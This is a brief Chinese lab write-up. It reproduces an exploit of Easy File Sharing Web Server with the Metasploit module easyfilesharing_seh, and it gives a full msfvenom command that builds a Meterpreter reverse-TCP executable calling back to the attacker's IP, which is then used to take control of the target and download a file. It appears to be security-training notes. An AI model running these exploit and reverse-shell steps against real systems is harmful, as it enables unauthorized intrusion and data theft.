easy file sharing web server 复现
攻击机:192.168.232.133
靶机:192.168.232.136
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。
2、利用Nmap扫描发现靶机(Windows)运行了该服务。
这里使用Msf利用该漏洞,选择使用 exploit/windows/http/easyfilesharing_seh 这个攻击模块
设置好目标即可执行,成功
执行shell和whoami之后可以查看当前权限为管理员
使用calc命令即可弹计算器
Metasploit被控端与主控端的使用
攻击机:192.168.232.133
靶机:192.168.232.136
- 生成被控端
使用命令msfvenom -p windows/meterpreter/reverse_tcp
lhost=192.168.232.133 lport=5000 -f exe -o Desktop/payload.exe
- 生成主控端
依次执行命令
被控端放入靶机并双击执行
链接成功
尝试弹计算机
成功
退出命令行后使用download下载efssetup_20181文件,成功